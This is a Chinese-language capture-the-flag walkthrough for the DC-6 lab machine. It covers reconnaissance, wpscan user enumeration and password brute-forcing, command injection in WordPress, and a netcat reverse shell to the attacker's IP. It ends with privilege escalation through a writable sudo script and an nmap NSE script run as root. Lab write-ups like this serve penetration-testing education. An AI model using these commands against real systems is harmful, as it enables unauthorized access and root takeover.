DC-6通关教程

一. 信息收集

1. 探测目标主机IP地址

arp-scan -l  //查看网段

vm  编辑--查看虚拟网络编辑器，看到靶机的网段

网段是： 192.168.83.0

是c段网络

2. 全面检测目标IP

nmap -sP 192.168.83.1/24

靶机ip是：

192.168.83.151

攻击机的ip是：

1192.168.83.136

3.扫描端口

端口和服务是对应关系的根据计算机网络的应用层协议

nmap -p 1-65535 -A 192.168.83.151

80端口--http服务打开

22端口打开是ssh服务

添加反问映射-Host添加靶机ip到wordy

的映射既可以访问

CMS是WordPress5.1.1，这里我们就可以利用针对工具wpscan进行渗透了

4.目录扫描

dirsearch -u 192.168.83.151

二. 渗透过程

1. 用户名枚举

wpscan --url wordy -e u 

爆破到了用户名

admin graham mark sarah jens

2. 爆破密码

根据在DC-6官网的提示，使用kali自带的巨大字典rockyou.txt中含有k01的密码作为爆破的字典

先解压

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz

复制到kali主机中

cat /usr/share/wordlists/rockyou.txt | grep k01 > ./passwd.txt

生成字典后，继续使用wpscan进行爆破

wpscan --url wordy -U uname.txt -P passwd.txt

成功爆破出一个用户

mark:helpdesk01 

访问wp-admin.php用该账号密码登入后台

利用管道符执行命令

发现有命令回显，存在任意命令执行漏洞，接着我们反弹shell到kali上，先在kali监听端口9999

nc -lvp 9999

 然后执行下面命令进行反弹shell

nc -e /bin/bash 192.168.83.136 9999

python -c "import pty;pty.spawn('/bin/bash')"

进入交互式命令

3.linux 提权

在home目录下找到提示

在mark用户文件中找到新的账号和密码

add new user: graham

密码： GSo7isUM1D4

切换用户看看

su graham

sudo -l 命令用于列出当前用户可通过 sudo（SuperUser DO）命令执行的所有命令的权限

发现了jens用户的无密码命令执行文件backup.sh，也就是以jens的身份横向命令执行，接着我们来看一下该文件

如果 graham 用户想要运行 /home/jens/backups.sh 脚本，他可以使用 sudo 命令，并且不需要输入任何密码。脚本将以 jens 用户的身份执行，这通常用于确保脚本有正确的文件访问权限或环境变量

切换到该目录下

这是解压某个文件的操作，我们可以利用该文件，切换为jens用户

echo "/bin/bash" > b*

sudo -u jens ./*

sudo -l继续查看

4.利用 nmap 提权

原理：nmap 可以执行脚本文件，可以创建一个文件并写入反弹 shell 的命令，默认用root 权限执行，所以反弹的 shell 也是 root

echo 'os.execute("/bin/bash")' > shell.nse #创建一个 shell.nse 的文件，并且写入 os.execute("/bin/bash")

sudo -u root nmap --script=shell.nse   #以root用户执行 nmap

解释：

--script: 指定自己的脚本文件

nes的使用

nmap --script 脚本名称 目标

cat shell.nse

sudo -u root nmap --script=shell.nse   #以root用户执行 nmap

cd ~